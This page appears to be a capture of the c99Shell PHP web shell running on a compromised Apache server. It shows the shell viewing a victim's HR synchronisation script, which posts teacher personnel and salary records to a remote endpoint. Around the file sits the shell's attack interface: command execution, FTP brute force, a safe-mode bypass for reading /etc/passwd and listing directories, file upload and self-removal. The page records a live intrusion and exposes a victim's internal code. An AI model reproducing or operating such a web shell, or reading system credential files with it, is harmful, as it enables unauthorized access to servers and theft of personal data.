!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/includes/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cURL.php (8.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

require_once("../configuration.php");
require_once(
"../includes/connMySQL.class.php");

$conn = new DBConn();

$sql "select deptId from dev_config";
$result $conn->execQuery($sql);
$rs $conn->fetchObject($result);
$deptId $rs->deptId;

function 
curlTestConnection(){
    
    global 
$_Config_curl_ip;

    if(
fsockopen($_Config_curl_ip80$num$error5)) return true;
    else return 
false;

}

function 
cURL($postfields){

    global 
$_Config_curl_path;

    
$curlSendStatus true;
    
    if(
curlTestConnection()){
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$_Config_curl_path);
        
curl_setopt($chCURLOPT_POST1);
        
curl_setopt($chCURLOPT_POSTFIELDS$postfields);
        
curl_setopt($chCURLOPT_RETURNTRANSFER1);
        
//curl_setopt($ch, CURLOPT_HEADER, true); // Display headers
        //curl_setopt($ch, CURLOPT_VERBOSE, true);
        
$response curl_exec($ch);
        
curl_close($ch);
        
        if(
$response == 1$curlSendStatus true;
        else 
$curlSendStatus false;
    }
    else 
$curlSendStatus false;

    
//echo "function cURL() - \$response = $response<br>";

    
if($curlSendStatus) return true;
    else return 
false;
}

//------- HR Person -------//
function hrPersonCurl($perid,$Teacher_code$id$pcode$fname$lname$birthdate$sex$appointdate $startdate$fperson$statusId$posid$poscode$levelcode$salary$cercode$cerid$fposition$deptcode$tcode,  $workcode$Dev_type$schstartdate,  $schstopdate){
    
    global 
$deptId;

    
$postfields['perid'] = $perid;
    
$postfields['deptId'] = $deptId;
    
$postfields['Teacher_code'] = $Teacher_code;    
    
$postfields['id'] = $id;
    
$postfields['pcode'] = $pcode;
    
$postfields['fname'] = $fname;
    
$postfields['lname'] = $lname;
    
$postfields['birthdate'] = $birthdate;
    
$postfields['sex'] = $sex;
    
$postfields['appointdate'] = $appointdate;
    
$postfields['startdate'] = $startdate;
    
$postfields['fperson'] = $fperson;
    
$postfields['statusId'] = $statusId;
    
$postfields['posid'] = $posid;
    
$postfields['poscode'] = $poscode;
    
$postfields['levelcode'] = $levelcode;
    
$postfields['salary'] = $salary;
    
$postfields['cercode'] = $cercode;
    
$postfields['cerid'] = $cerid;
    
$postfields['fposition'] = $fposition;
    
$postfields['deptcode'] = $deptcode;
    
$postfields['tcode'] = $tcode;
    
$postfields['workcode'] = $workcode;
    
$postfields['Dev_type'] = $Dev_type;
    
$postfields['schstartdate'] = $schstartdate;
    
$postfields['schstopdate'] = $schstopdate;
    
$postfields['status'] = "hrPerson";

    
$response cURL($postfields);

    
//echo "Function hrPersonCurl() - \$response = $response<br>";
        
    
return $response;

}

function 
deleteHrPersonCurl($perid){

    global 
$deptId;

    
$postfields['HiseduId'] = $perid;
    
$postfields['deptId'] = $deptId;
    
$postfields['status'] = "deleteHrPerson";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkHrPersonCurl($perid){
    
    global 
$deptId;

    
$postfields['perid'] = $perid;
    
$postfields['deptId'] = $deptId;
    
$postfields['status'] = "checkHrPerson";
    
    
$response cURL($postfields);
    
    return 
$response;

}

//------- HR Education -------//
function hrEduCurl($HiseduId$perid$levelPos$levelHig$levelcode$qcode$qname$Major$institute$univId$countrycode$startdeerdate$enddeerdate$eyear$qflag$mflag){
    
    global 
$deptId;

    
$postfields['HiseduId'] = $HiseduId;    
    
$postfields['deptId'] = $deptId;
    
$postfields['perid'] = $perid;
    
$postfields['levelPos'] = $levelPos;
    
$postfields['levelHig'] = $levelHig;
    
$postfields['levelcode'] = $levelcode;
    
$postfields['qcode'] = $qcode;
    
$postfields['qname'] = $qname;
    
$postfields['Major'] = $Major;
    
$postfields['institute'] = $institute;
    
$postfields['univId'] = $univId;
    
$postfields['countrycode'] = $countrycode;
    
$postfields['startdeerdate'] = $startdeerdate;
    
$postfields['enddeerdate'] = $enddeerdate;
    
$postfields['eyear'] = $eyear;
    
$postfields['qflag'] = $qflag;
    
$postfields['mflag'] = $mflag;
    
$postfields['status'] = "hrEdu";

    
$response cURL($postfields);
    
    return 
$response;

}

function 
deleteHrEduCurl($HiseduId){

    global 
$deptId;

    
$postfields['HiseduId'] = $HiseduId;
    
$postfields['deptId'] = $deptId;
    
$postfields['status'] = "deleteHrEdu";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkHrEduCurl($HiseduId){
    
    global 
$deptId;

    
$postfields['HiseduId'] = $HiseduId;
    
$postfields['deptId'] = $deptId;
    
$postfields['status'] = "checkHrEdu";    

    
$response cURL($postfields);
    
    return 
$response;

}

//------- HR His -------//
function hrHisCurl($HisId$Teacher_code$perid$Date$No_in$Dated$cname$orders$Training_code$startdate$enddate$daycount$day$Year_std$traincenter$provcode$countrycode$univId$unit$moneybudget1$moneybudget2$moneybudget3$moneybudget4$money$Training_std$moneycenter$Content$unitpoint$Skills$cdevcode$Orgskills$Groskills$Perskills$Hiskills$Training_type$traindept){

    global 
$deptId;

    
$postfields['HisId'] = $HisId;
    
$postfields['deptId'] = $deptId;
    
$postfields['Teacher_code'] = $Teacher_code;    
    
$postfields['perid'] = $perid;
    
$postfields['Date'] = $Date;
    
$postfields['No_in'] = $No_in;
    
$postfields['Dated'] = $Dated;
    
$postfields['cname'] = $cname;
    
$postfields['orders'] = $orders;
    
$postfields['Training_code'] = $appointdate;
    
$postfields['startdate'] = $startdate;
    
$postfields['enddate'] = $enddate;
    
$postfields['daycount'] = $daycount;
    
$postfields['day'] = $day;
    
$postfields['Year_std'] = $Year_std;
    
$postfields['traincenter'] = $traincenter;
    
$postfields['provcode'] = $provcode;
    
$postfields['countrycode'] = $countrycode;
    
$postfields['univId'] = $univId;
    
$postfields['unit'] = $unit;
    
$postfields['moneybudget1'] = $moneybudget1;
    
$postfields['moneybudget2'] = $moneybudget2;
    
$postfields['moneybudget3'] = $moneybudget3;
    
$postfields['moneybudget4'] = $moneybudget4;
    
$postfields['schstartdate'] = $schstartdate;
    
$postfields['money'] = $money;
    
$postfields['Training_std'] = $Training_std;
    
$postfields['moneycenter'] = $moneycenter;
    
$postfields['Content'] = $Content;    
    
$postfields['unitpoint'] = $unitpoint;
    
$postfields['Skills'] = $Skills;
    
$postfields['cdevcode'] = $cdevcode;
    
$postfields['Orgskills'] = $Orgskills;
    
$postfields['Groskills'] = $Groskills;
    
$postfields['Perskills'] = $Perskills;
    
$postfields['Hiskills'] = $Hiskills;
    
$postfields['Training_type'] = $Training_type;
    
$postfields['traindept'] = $traindept;
    
$postfields['status'] = "hrHis";

    
$response cURL($postfields);
    
    return 
$response;

}

function 
deleteHrHisCurl($HisId){

    global 
$deptId;

    
$postfields['HisId'] = $HisId;
    
$postfields['deptId'] = $deptId;
    
$postfields['status'] = "deleteHrHis";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkHrHisCurl($HisId){
    
    global 
$deptId;

    
$postfields['HisId'] = $HisId;
    
$postfields['deptId'] = $deptId;
    
$postfields['status'] = "checkHrHis";    

    
$response cURL($postfields);
    
    return 
$response;

}

//------- CourseEDU -------//
function courseEduCurl($educosId$perid$Certificates$Course$univName$countryname$startdate$enddate$Expertise$ExpertiseDetail$Flag){
    
    global 
$deptId;

    
$postfields['educosId'] = $educosId;    
    
$postfields['deptId'] = $deptId;
    
$postfields['perid'] = $perid;
    
$postfields['Certificates'] = $Certificates;
    
$postfields['Course'] = $Course;
    
$postfields['univName'] = $univName;
    
$postfields['countryname'] = $countryname;
    
$postfields['startdate'] = $startdate;
    
$postfields['enddate'] = $enddate;
    
$postfields['Expertise'] = $Expertise;
    
$postfields['ExpertiseDetail'] = $ExpertiseDetail;
    
$postfields['Flag'] = $Flag;
    
$postfields['status'] = "courseEdu";

    
$response cURL($postfields);
    
    return 
$response;

}

function 
deleteCourseEduCurl($educosId){

    global 
$deptId;

    
$postfields['educosId'] = $educosId;
    
$postfields['deptId'] = $deptId;
    
$postfields['status'] = "deleteCourseEdu";    

    
$response cURL($postfields);
    
    return 
$response;

}

function 
checkCourseEduCurl($educosId){
    
    global 
$deptId;

    
$postfields['educosId'] = $educosId;
    
$postfields['deptId'] = $deptId;
    
$postfields['status'] = "checkCourseEdu";    

    
$response cURL($postfields);
    
    return 
$response;

}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0168 ]--